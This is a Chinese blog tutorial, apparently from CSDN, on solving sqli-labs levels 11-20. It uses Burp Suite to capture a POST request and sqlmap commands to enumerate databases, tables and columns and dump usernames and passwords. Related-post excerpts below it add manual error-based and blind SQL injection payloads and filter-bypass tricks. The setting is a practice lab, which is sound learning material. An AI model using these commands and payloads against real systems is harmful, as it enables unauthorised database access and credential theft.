(sqlmap)【sqli-labs11-20】爆破本地数据文件

已于 2022-07-10 21:41:20 修改
阅读量1.4k 收藏 13
点赞数 6
CC 4.0 BY-SA版权
分类专栏: # 【全】sqlil-abs靶场 文章标签: web安全 数据库
于 2022-07-07 15:22:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_53079406/article/details/125658889

目录

一、简介:

二、利用过程:

2.1、第一步:代理抓包

2.2、第二步:保存文件

2.3、第三步:爆破数据库

爆数据库

爆表名

爆字段名

爆数据

 推荐:

(手工)【sqli-labs11-12】POST注入:基本步骤、示例https://blog.youkuaiyun.com/qq_53079406/article/details/125655261?spm=1001.2014.3001.5501

一、简介:

使用bp+代理将抓住的包保存到本地文件进行跑

二、利用过程:

2.1、第一步:代理抓包

浏览器设置代理使用bp抓包

2.2、第二步:保存文件

使用BURP保存数据包到本地,命名为1.txt

 

 

2.3、第三步:爆破数据库

爆数据库

python sqlmap.py -r ’C:\Users\*****\Desktop\1.txt‘(文件保存的位置) --technique UE --dbms mysql --batch --dbs

 

爆表名

python sqlmap.py -r 'C:\Users\*****\Desktop\1.txt' --technique UE --dbms mysql --batch -D security --tables

爆字段名

python sqlmap.py -r 'C:\Users\*****\Desktop\1.txt' --technique UE --dbms mysql --batch -D security -T users --columns

 

爆数据

python sqlmap.py -r 'C:\Users\****\Desktop\1.txt' --technique UE --dbms mysql --batch -D security -T users -C 'username,password' --dump

sqli-lab 11-20
qq_48413575的博客
01-11 2290
sqli-lab 11-20
sqlmapsqli-labs速通攻略
m0_74824002的博客
12-09 755
ps:由于sqlmap生成的payload太长,暴字段和值的时候可能会有问题,暴值的时候可以一个字段一个字段注。使用了addSlashes()函数转义,正常会想到宽字节,但是此题是数字型,非引号类型注入,因此直接注就行。注意,因为该接口本身就是会对数据做更新的,因此使用sqlmap注入会导致数据被更新,密码会变为1。本题除了过滤了and or外,空格和#也被过滤。and和or用双写绕过,空格用%a0绕过,#用。,也就是cookie的值进行了base64编码,需要使用–tamper指定base64编码处理。
sqlmap爆破post数据
a843538946的专栏
12-17 1513
burpsuite截获的数据包存放到sqlmap本地目录中 python sqlmap.py -r "abc.txt" --batch --dump-all   --dump-all 爆破所有  
sqli-labs靶场11-17关(POST型)
bunengyongzho666的博客
05-05 976
uname=admin' and if((substr((select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1),1,1)='s'),sleep(5),1)#爆字段。uname=admin&passwd=123' and updatexml(1,concat(0x7e,(database()),0x7e),1)#——爆数据库
sqli-labs-less-15 post布尔盲注+sqlmap爆破
yzcn
11-12 1058
Less-15 方法一: Post传参,先用burp suite抓包 判断闭合方式: uname=’ or 1=1 #&passwd=&submit=Submit 显示登录成功,闭合方式为’’ uname=’) or 1=1 #&passwd=&submit=Submit 添加符号后没有报错信息,直接返回登录失败,说明这题只有正确或者错误两种返回,可以使用布尔盲注进行注入。 Substr(a,b,c):从位置b开始截取a字符中的前c个字符 判断当前数据库名长度: u
burpsuite和sqlmap配合,通过sql注入漏洞爆oracle当前用户
zhj9705的博客
07-15 513
注:--proxy=http://127.0.0.1:8080是为了burpsuite里面HTTP history可以看到记录,方便检查访问是正常的,后续为了性能,可以不要。3.点击有注入漏洞的历史记录,保存到文件zhj.txt。burpsuite_pro_v2023.6安装成功。4.编辑保存的文件zhj.txt,找到注入点,加入。..............等待成果。2.在浏览器里面操作,可看历史记录。sqlmap代码下载。
【SQL注入15】自动化注入技术(基于sqlmap工具和sqli-labs-less1靶场平台)
Fighting_hawk的博客
02-22 4687
1. SQLMAP很自动化,能极大提高工作效率; 2. 掌握SQLMAP的常用命令; 3. 通过SQLMAP自动化运行过程代码,加深对注入原理的理解。
Sqli-labs靶场通关(1-20关)
2301_77977773的博客
07-03 1099
为了不影响 80 端口的服务,我们可以设置 Apache 服务的端口为82这是因为主机本身已经存在 MySQL 服务,我们可以不使用 php-study 配置中的 MySQL,就用主机本身即可,但版本可能需要注意,我这里使用的 5.7.351.安装sqli-labs-master到phpstudy_pro中的WWW/目录下2.修改phpstudy_pro\WWW\sqli-labs-master\sql-connections的db-creds.inc文件。
网络安全-sqlmap实战之sqlilabs-Less4_用kali中的sqlmap工具完成sqli-labs less-4
2401_84254087的博客
05-02 417
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
sqlmapSQLi-LABS靶场 1-10关
小明师傅博客
06-04 8695
今天我们来用sqlmap去做SQLi-LABS靶场 首先来讲一下基础命令 1.清除sqlmap缓存: 第一个办法:在C:\Users\dragoneyes.sqlmap\output,删除output里面的内容 第二个办法:sqlmap.py --purge 2.sqlmap -u 注入点 检测注入点是否可用 sqlmap -u 注入点 –batch 自动输入 暴库 sqlmap -u 注入点 –dbs //暴库 Web当前使用的数据库 sqlmap -u 注入点 –current-db //爆当前使用的库
sqlmap sqli-labs
最新发布
07-16
对于 sqli-labs 靶场中的某些关卡(如第11至17关),可以使用以下命令来进行测试: - **启动 sqlmap 探测注入点** ```bash sqlmap -u ...
[Web安全入门]在BURP中配置SQLMap详解
_DESpiSED的博客
09-17 1568
本文详细介绍了BURPSQLMap的联动使用过程中所用到的配置过程
burp suite爆破sqli-labs的 less-5
顶峰
12-31 970
1.默认为sniper模式,即如果有多个变量,对每个变量依次进行破解,一次只替换一个变量 也就是说,如果有username和password两个变量,那么它会先对username进行爆>破,password字段不会改变,然后username不变,再对password字段进行爆破2.Battering ram 模式:对多个变量同时进行破解比如有username和password两个字段,使用字典进行破解,那么每次都会用字典中的一个值将两个变量同时替换。
sqlmap使用教程(sqli-labs11-20
小同的博客
05-22 875
sql-labs-less11~less17常规 POST 注入 sql-labs-less18 Header injection - Uagent sqlmap 在对user-agent 注入的时候,得在文件中的user-agent的参数后面加上 * 或者不加 * 号,调用 --level参数,将等级调至 3级,只有等级为 3级即以上时才能对 user-agent进行注入 sql-labs-less19 Header injection ...
利用burpsite和sqlmap进行post注入
Assassin
06-05 4961
尝试用burpsite和sqlmap进行自动post注入,目标(一道题目)http://120.24.86.145:8002/chengjidan/第一步 用burpsite抓包并保存成txt第二步 用sqlmap语句sqlmap -r 保存的txt文件 -p 需要注入的变量然后我们的注入语句为python sqlmap.py -r C:\Users\Assassin\Desktop\inp
burpsuite保存现有数据包记录&导入之前的抓包记录
热门推荐
Fly_鹏程万里
03-27 1万+
前言 有时候我们在做渗透测试的时候,我们使用burpsuite抓取网络数据包,并且做了刚好一半,但是却要关机(比如说快没电了,或者说因为要外出携带电脑为了电脑号所以要关机等等),在这种情况下,如果你关机,那么所有之前的数据包记录将会变为空,那么如何操作呢?burpsuite 1.7系列提供了这种便捷。 保存现有数据包 现有数据包 Burp->Save state: 选择想要...
vulnhub之doubletrouble: 1
weixin_54431413的博客
06-05 2416
开源项目信息收集 框架漏洞突破边界 利用sudo配置不当进行提权 tabby工具远程连接linux,sftp传输文件 sql之时间盲注拿到密码打点成功 脏牛漏洞提权成功,复原/etc/passwd 改掉root密码
BurpSuite数据包的导出及导入
Junior_Q的博客
11-30 7573
这里写自定义目录标题说明导出导入 说明 在使用BurpSuite时难免会出现中途要关闭burp可是需要保存当前的数据包记录,或者想要将当前的数据包记录分享给他人,那么就需要用到BurpSuite的导出和导入功能了。 导出 这是我们的浏览的数据包,现在将这些记录进行导出 点击Project—>Save copy 这里选择你想要保存的数据(根据个人需要进行选择),然后点击Next 这里默认选择第一项,点击Next 选择要保存的路径 点击Next 到这就已经导出成功了 这里你想要直接退出burp
sqli-labs第二十关
m0_73248913的博客
02-16 566
sqlilabs第二十关cookie注入
sqlmap Sqli-Labs
02-19
### 使用 `sqlmap` 进行 Sqli-Labs 测试 #### 基础命令介绍 为了有效地利用 `sqlmap` 对 SQL 注入漏洞进行测试,理解其基本命令至关重要。例如,在启动针对 sqli-labs 的攻击之前,可以通过指定目标 URL 来初始化扫描过程[^4]。 ```bash python sqlmap.py -u "http://sqli-labs-php7-master/Less-1/?id=1" ``` 此命令会尝试检测并利用给定URL中的任何潜在SQL注入点。 #### 自动化批量处理选项 当希望减少交互次数时,可以加入 `--batch` 参数来自动确认所有提示,默认选择第一个选项继续执行任务而不需人工干预[^1]。 ```bash python sqlmap.py -u "http://sqli-labs-php7-master/Less-1/?id=1" --batch ``` 这使得连续通过多个关卡变得更加高效便捷。 #### 数据库枚举操作 对于想要获取数据库结构信息的情况,比如列出可用的数据库名称,则可以在原有基础上追加 `-dbs` 参数: ```bash python sqlmap.py -u "http://sqli-labs-php7-master/Less-1/?id=1" --batch -dbs ``` 该指令不仅能够识别是否存在可被利用的SQL注入缺陷,还能进一步探索背后隐藏的数据存储情况[^2]。 #### 高级配置与优化设置 有时可能遇到更复杂的场景,这时就需要借助额外的功能参数来进行定制化的渗透测试工作。例如,指明特定类型的数据库管理系统(`--dbms`)以及采用何种技术手段(`--technique`)实施攻击;同时启用优化模式(-o),加快整个流程的速度[^3]: ```bash python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-8/?id=1" --dbms mysql --technique B -o -D security --tables --batch ``` 上述例子展示了如何精确控制 `sqlmap` 行为以适应不同环境下的需求。 #### 应对Web应用防火墙(WAF) 面对某些部署了 WAF 的 web 应用程序,可能会发现常规方法难以奏效。此时应考虑调整策略或增加其他绕过机制。不过,在许多情况下,简单的重复调用仍能成功突破防护措施[^5]。 ```bash sqlmap -u http://127.0.0.1:8081/Less-29/?id=1 --batch --dbs ``` 以上就是使用 `sqlmap` 工具配合 sqli-labs 平台开展安全研究的一些常见实践方式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值